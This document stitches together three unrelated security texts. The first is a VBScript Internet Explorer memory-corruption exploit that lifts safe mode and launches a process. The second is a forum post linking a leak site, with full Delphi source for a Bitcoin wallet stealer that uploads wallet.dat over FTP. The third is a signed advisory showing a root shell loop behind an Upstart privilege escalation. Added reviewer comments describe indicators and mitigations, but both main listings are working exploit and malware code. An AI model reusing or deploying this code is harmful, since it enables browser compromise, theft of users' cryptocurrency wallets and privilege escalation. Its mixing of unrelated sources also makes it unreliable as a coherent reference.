//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. https://twitter.com/yuange75 http://http://hi.baidu.com/yuange1975 *//
<!doctype html>
<!--
  Reviewer annotation (defensive reading of this proof-of-concept):
  - The page pins a legacy document mode (IE=EmulateIE8) and does all of its work
    in VBScript, so it only matters where a browser still runs VBScript for web
    content.
  - Begin() returns early unless the user agent contains "MSIE" and lacks "Win64";
    a crawler or sandbox presenting another user agent sees an inert page.
  - The visible payload is runmumaa(), which starts notepad.exe through
    Shell.Application. A browser process creating a child process is the
    observable outcome to alert on.
  - Every routine uses On Error Resume Next, so failed steps are silent.
  - Mitigation: keep the scripting engine patched, disable VBScript for untrusted
    zones, and retire browsers that still execute VBScript from web pages.
-->
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">
' Payload stand-in: launches notepad.exe via Shell.Application.
' It is only called at the end of setnotsafemode().
function runmumaa()
  On Error Resume Next
  set shell=createobject("Shell.Application")
  shell.ShellExecute "notepad.exe"
end function
</script>

<SCRIPT LANGUAGE="VBScript">
' Script-global state shared by every routine below.
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

' Runs as soon as the script block is parsed; no user interaction is involved.
Begin()

' Entry point: gates on the user agent, initialises the arrays, and continues
' only if Create() reports success.
function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  ' 64-bit browsers are skipped outright.
  if(instr(info,"Win64")>0) then
    exit function
  end if

  ' Only "MSIE" user agents continue; the two characters after "MSIE " are parsed as the version.
  if (instr(info,"MSIE")>0) then
    intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
    exit function
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
    ' Fixed 12-character string built from code points; on this page it is only
    ' consumed by mydata(), which stores it in aa(a1+2).
    myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

    if(intVersion<4) then
      document.write("<br> IE")
      document.write(intVersion)
      ' runshellcode is not defined anywhere on this page; with On Error Resume Next
      ' the call fails silently.
      runshellcode()
    else
      setnotsafemode()
    end if
  end if
end function

' Sizes both arrays to 6 elements and picks randomised starting values for a0 and a3,
' so the array sizes differ between runs and are poor static signatures.
function BeginInit()
  Randomize()
  redim aa(5)
  redim ab(5)
  a0=13+17*rnd(6)
  a3=7+3*rnd(5)
end function

' Calls Over() up to 401 times and returns True on the first success.
function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
      ' document.write(i)
      Create=True
      Exit For
    End If
  Next
end function

' Intentionally empty; referenced by mydata().
sub testaa()
end sub

' Temporarily enlarges aa, stores values in aa(a1) and aa(a1+2) while writing
' numeric literals into ab(0) and ab(2), and returns aa(a1).
' NOTE(review): the statement order and the literals are load-bearing; left untouched.
function mydata()
  On Error Resume Next
  i=testaa
  i=null
  redim Preserve aa(a2)

  ab(0)=0
  aa(a1)=i
  ab(0)=6.36598737437801E-314

  aa(a1+2)=myarray
  ab(2)=1.74088534731324E-310
  mydata=aa(a1)
  redim Preserve aa(a0)
end function

' Follows three values obtained through mydata()/ReadMemo(), then scans offsets
' &h120 through &h180 in steps of 4 for the value 14. At the first match it assigns
' ab(4) through aa(a1+2) at offset &h11c+k, and finally calls runmumaa().
' NOTE(review): the name suggests this lifts the engine's safe-mode restriction that
' would otherwise refuse Shell.Application for web content; inferred, not shown here.
function setnotsafemode()
  On Error Resume Next
  i=mydata()
  i=readmemo(i+8)
  i=readmemo(i+16)
  j=readmemo(i+&h134)
  for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
      j=0
      redim Preserve aa(a2)
      aa(a1+2)(i+&h11c+k)=ab(4)
      redim Preserve aa(a0)

      j=0
      j=readmemo(i+&h120+k)

      Exit for
    end if

  next
  ab(2)=1.69759663316747E-313
  runmumaa()
end function

' One attempt: advances a0 by a3, resizes aa to a0, allocates ab(a0), then resizes
' aa again to a0+&h8000000 with Preserve. It inspects VarType of aa(a1-1) and aa(a1),
' which lie past the a0 bound, and reports success only when the type value is
' &h2f66 or &hB9AD (the latter also sets win9x).
' NOTE(review): those two constants presumably derive from the literal written to
' ab(0) just before the checks; not verified here.
' Detection hint: "redim Preserve" with a bound near &h8000000 in page script is a
' strong static indicator.
function Over()
  On Error Resume Next
  dim type1,type2,type3
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000

  redim Preserve aa(a0)
  redim ab(a0)

  redim Preserve aa(a2)

  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10

  If(IsObject(aa(a1-1)) = False) Then
    if(intVersion<4) then
      mem=cint(a0+1)*16
      j=vartype(aa(a1-1))
      if((j=mem+4) or (j*8=mem+8)) then
        if(vartype(aa(a1-1))<>0) Then
          If(IsObject(aa(a1)) = False ) Then
            type1=VarType(aa(a1))
          end if
        end if
      else
        ' Restore the original size before giving up on this attempt.
        redim Preserve aa(a0)
        exit function

      end if
    else
      if(vartype(aa(a1-1))<>0) Then
        If(IsObject(aa(a1)) = False ) Then
          type1=VarType(aa(a1))
        end if
      end if
    end if
  end if

  If(type1=&h2f66) Then
    Over=True
  End If
  If(type1=&hB9AD) Then
    Over=True
    win9x=1
  End If

  redim Preserve aa(a0)

end function

' Helper used by setnotsafemode(): temporarily enlarges aa, stores add+4 in aa(a1),
' writes a numeric literal into ab(0), and returns LenB(aa(a1)); it then resets ab(0)
' and the array size.
' NOTE(review): callers treat the result as a value read at "add"; inferred from the
' name and the call sites.
function ReadMemo(add)
  On Error Resume Next
  redim Preserve aa(a2)

  ab(0)=0
  aa(a1)=add+4
  ab(0)=1.69759663316747E-313
  ReadMemo=lenb(aa(a1))

  ab(0)=0

  redim Preserve aa(a0)
end function

</script>

</body>
</html>
-
Ce parere aveti despre wallet stealer-ul asta https://leakforums.org/thread-232703

program dbs;

// Bitcoin Stealer
// developed by Jimmy
// for http://exclusivehackingtools.blogspot.com

// REVIEW (defensive summary of what this listing shows):
//  - Hides its console window, then looks for Bitcoin\wallet.dat under the current
//    user's profile and, if the file is smaller than 10,000,000 bytes, uploads it
//    over FTP under a random 20-character name ending in '.dat'.
//  - Host marker: string value 'Version' = '6556' in the 'Google' section of
//    HKEY_CURRENT_USER\Software, written after an upload attempt and read at start-up
//    to skip hosts already processed. The key name imitates a legitimate vendor.
//  - Network indicator: an outbound FTP session from a workstation that stores a
//    '.dat' file; FTP carries the credentials and the file in clear text.
//  - Mitigations: encrypt the wallet with a passphrase so that a copied wallet.dat is
//    not directly usable, keep wallets off general-purpose workstations, restrict
//    outbound FTP, and alert on unexpected processes reading wallet.dat.
//  - As posted, Debug is True, so the Connect and Put calls are skipped.

{$IF CompilerVersion >= 21.0}
{$WEAKLINKRTTI ON}
{$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}
{$IFEND}

uses
  Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry;

// Function to set the window state hidden
function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow';

// Function to get the AppData path
// REVIEW: requests CSIDL_LOCAL_APPDATA, i.e. the per-user local application data folder.
function AppDataPath: String;
const
  SHGFP_TYPE_CURRENT = 0;
var
  Path: array [0 .. MAXCHAR] of char;
begin
  SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @path[0]);
  Result := StrPas(Path);
end;

// Function to check a file size
// REVIEW: returns -1 when FindFirst does not find the file.
function FileSize(FileName: wideString): Int64;
var
  sr: TSearchRec;
begin
  if FindFirst(FileName, faAnyFile, sr) = 0 then
    Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow)
  else
    Result := -1;
  FindClose(sr);
end;

// Function to generate random string
// REVIEW: draws PLen characters from [a-zA-Z0-9]; the uploaded file name is therefore
// not a stable indicator, only its length (20) and the '.dat' suffix are.
function RandomString(PLen: Integer): string;
var
  str: string;
begin
  Randomize;
  str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  Result := '';
  repeat
    Result := Result + str[Random(Length(str)) + 1];
  until (Length(Result) = PLen);
end;

// ============================================================================

var
  Debug: Boolean;
  FTP: TIdFTP;
  REG: TRegIniFile;
  RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String;
  Error: String;

begin
  // The window should be hidden without using this API
  ShowWindow(GetConsoleWindow, SW_HIDE);

  // Debug or build release ?
  Debug := True;

  // Set registry key value (random)
  // REVIEW: the value is a fixed literal in this listing, so it can serve as a host indicator.
  RegValue := '6556';

  // At the end of the first execution we will write a key in the registry.
  // Now we will try check if the key exists. If yes, it means
  // that the wallet has already be stolen. Avoid useless duplicates.
  try
    REG := TRegIniFile.Create;
    REG.RootKey := HKEY_CURRENT_USER;
    REG.OpenKeyReadOnly('Software');
    RegCurrentValue := REG.ReadString('Google', 'Version', '');
    REG.CloseKey;
    REG.Free;
  except
    // REVIEW: registry read failures are swallowed; RegCurrentValue then stays empty.
  end;

  // Check if wallet has been already stolen (to avoid duplicates)
  if not(RegCurrentValue = RegValue) then
  begin
    try
      // Generate path to Bitcoin wallet file
      if Win32MajorVersion >= 6 then
        // Microsoft Windows Vista and newer
        Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat')
      else
        // Microsoft Windows XP
        Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat');

      // If wallet file exists, check the FileSize (skip large file > 10MB)
      if FileExists(Path) then
        if FileSize(Path) < 10000000 then
        begin
          // Generate a random filename
          FileName := RandomString(20) + '.dat';

          // Initialize upload via Indy FTP component
          FTP := TIdFTP.Create();
          FTP.ConnectTimeout := 20000;
          FTP.ReadTimeout := 20000;

          // Setup with your FTP details
          // REVIEW: placeholder values in the listing; a built sample would carry its
          // server and credentials as plain strings, recoverable by static analysis.
          FTP.Host := 'ftp.host.com';
          FTP.Username := 'username';
          FTP.Password := 'password';
          UploadPath := 'www/';

          // Connect and upload
          if not Debug then
          begin
            FTP.Connect;
            FTP.Put(Path, UploadPath + FileName);
          end;

          // After upload attempt, disconnect and free the FTP component
          // NOTE(review): Quit and Disconnect also run when Connect was skipped (Debug);
          // whether Indy raises in that case is not visible from this listing.
          FTP.Quit;
          FTP.Disconnect;
          FTP.Free;

          // Try to add a key to registry to avoid double execution
          // REVIEW: this write is not conditioned on Debug or on a successful upload.
          try
            REG := TRegIniFile.Create;
            REG.RootKey := HKEY_CURRENT_USER;
            REG.OpenKey('Software', True);
            REG.WriteString('Google', 'Version', RegValue);
            REG.CloseKey;
            REG.Free;
          except
          end;
        end;
    except
      // Catch error, you never know...
      // REVIEW: the message is stored in Error and never shown or logged.
      on E: Exception do
        Error := E.ClassName + ': ' + E.Message;
    end;
  end;
end.
-
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Although just reported to Ubuntu, this minor dev-branch issue was already made public. As the launchpad/lkml/... feed-miners should not play all the games alone, and as others may want to learn how beginner errors still make it into packages of quite large distributions, enjoy the power of

for session in /run/user/*/upstart/sessions/*
do
    env $(cat $session) /sbin/initctl emit rotate-logs >/dev/null 2>&1 || true
done

executed as root. See [1]

hd

[1] http://www.halfdog.net/Security/2015/UpstartLogrotationPrivilegeEscalation/

- --
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iEYEARECAAYFAlTwJXEACgkQxFmThv7tq+4LKgCcCKMaOdO0xObIno415g6qZAxp
LZQAnj8giZDPkLYZPD/TVhY958/vXMSJ
=xyAX
-----END PGP SIGNATURE-----

[Reviewer note, not part of the signed text: the loop runs as root, yet the unquoted $(cat $session) word-splits the contents of files under /run/user/*, a per-user directory that the session's owner can write, into arguments for env. A root job should run the per-session emit as the session's owner, or accept only validated values from those files.]

Source